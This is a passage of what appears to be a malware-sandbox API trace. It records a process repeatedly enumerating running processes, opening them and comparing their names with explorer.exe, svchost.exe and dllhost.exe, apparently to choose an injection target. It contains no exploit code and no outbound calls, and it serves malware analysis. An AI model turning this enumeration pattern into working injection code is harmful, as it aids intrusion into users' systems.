th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.262] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0204.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0204.262] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.262] CloseHandle (hObject=0xd8) returned 1 [0204.262] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0204.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0204.263] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0204.263] CloseHandle (hObject=0xd4) returned 1 [0204.264] Sleep (dwMilliseconds=0x3e8) [0205.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0205.326] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.327] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0205.327] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0205.328] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.328] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0205.328] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0205.329] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.329] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0205.329] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0205.330] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.330] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0205.330] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0205.331] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.331] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0205.331] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0205.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0205.332] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.332] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0205.332] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0205.333] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.333] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0205.333] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0205.334] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0205.334] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0205.335] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0205.335] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0205.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0205.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0205.336] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.336] CloseHandle (hObject=0xd8) returned 1 [0205.336] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0205.336] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0205.336] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0205.336] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0205.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0205.337] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0205.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0205.337] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.338] CloseHandle (hObject=0xd8) returned 1 [0205.338] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0205.338] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0205.338] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0205.338] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0205.338] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0205.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0205.339] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0205.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0205.339] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.339] CloseHandle (hObject=0xd8) returned 1 [0205.339] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0205.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0205.340] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.340] CloseHandle (hObject=0xd8) returned 1 [0205.340] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0205.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0205.341] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.341] CloseHandle (hObject=0xd8) returned 1 [0205.341] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0205.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0205.341] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.341] CloseHandle (hObject=0xd8) returned 1 [0205.341] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0205.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0205.342] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.342] CloseHandle (hObject=0xd8) returned 1 [0205.342] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0205.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0205.343] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.343] CloseHandle (hObject=0xd8) returned 1 [0205.343] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0205.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0205.343] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.343] CloseHandle (hObject=0xd8) returned 1 [0205.343] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0205.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0205.344] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.344] CloseHandle (hObject=0xd8) returned 1 [0205.344] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0205.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0205.344] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.344] CloseHandle (hObject=0xd8) returned 1 [0205.344] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0205.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0205.345] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.345] CloseHandle (hObject=0xd8) returned 1 [0205.345] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0205.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0205.346] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.346] CloseHandle (hObject=0xd8) returned 1 [0205.346] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0205.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0205.346] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.346] CloseHandle (hObject=0xd8) returned 1 [0205.346] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0205.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0205.347] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.347] CloseHandle (hObject=0xd8) returned 1 [0205.347] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0205.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0205.347] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.347] CloseHandle (hObject=0xd8) returned 1 [0205.347] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0205.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0205.348] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.348] CloseHandle (hObject=0xd8) returned 1 [0205.348] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0205.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0205.348] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.348] CloseHandle (hObject=0xd8) returned 1 [0205.348] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0205.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0205.349] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.349] CloseHandle (hObject=0xd8) returned 1 [0205.349] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0205.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0205.350] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.350] CloseHandle (hObject=0xd8) returned 1 [0205.350] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0205.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0205.350] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.350] CloseHandle (hObject=0xd8) returned 1 [0205.350] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0205.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0205.351] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.351] CloseHandle (hObject=0xd8) returned 1 [0205.351] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0205.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0205.351] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.351] CloseHandle (hObject=0xd8) returned 1 [0205.351] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0205.352] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0205.352] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0205.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0205.353] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0205.353] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0205.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0205.354] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0205.354] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: 